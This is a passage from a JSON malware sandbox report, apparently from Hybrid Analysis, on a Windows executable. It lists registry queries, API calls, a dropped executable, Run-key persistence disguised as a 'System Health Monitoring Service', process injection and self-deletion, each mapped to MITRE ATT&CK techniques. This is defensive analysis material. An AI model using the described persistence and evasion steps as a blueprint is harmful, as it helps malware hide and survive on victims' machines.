\"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"7710D6D13F5A851B55412FD22227E4E59CAA6003DF31819790E6A32CEA4A42CC\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"RELATIVEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" queries volume information of \"C:\\\" at 00000000-00004852-0000010C-450944\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004968-0000010C-226649\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004944-0000010C-426177", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" queries volume information of \"C:\\\" at 00000000-00004852-0000010C-450944\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004968-0000010C-226649\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004944-0000010C-426177", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006400c81d6400c31d6400000000000000000000006100000000019cdd22000000000000eb220095e1c9779fda0600feffffff435ccd775059cd77aa000000b8000000c21d6400c01d640024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5ccc7760d8c575ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096edcd77ea1d6400a06aa3758600000024df22005ce322000000000086008800a06aa37524df2200916ca375ea1d6400a06aa375a06aa37594e3220002020000 (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004852)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a00b8632a00b3632a00000000000000000000002700000000019cdc22000000000000ea220095e1c977c7de0600feffffff435ccd775059cd77aa000000b8000000b2632a00b0632a0024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5ccc7760d8c575ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096edcd77da632a00a06aa3758600000024de22005ce222000000000086008800a06aa37524de2200916ca375da632a00a06aa375a06aa37594e2220002020000 (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004968)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf00ce77d600ce775b39e97770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004968)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00004852)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00004852)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" has a section named \".eh_fram\"\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: 7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: 7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" wrote 16256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004968]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"7710d6d13f5a851b55412fd22227e4e59caa6003df31819790e6a32cea4a42cc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f
https://hybrid-analysis.com/sample/3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f
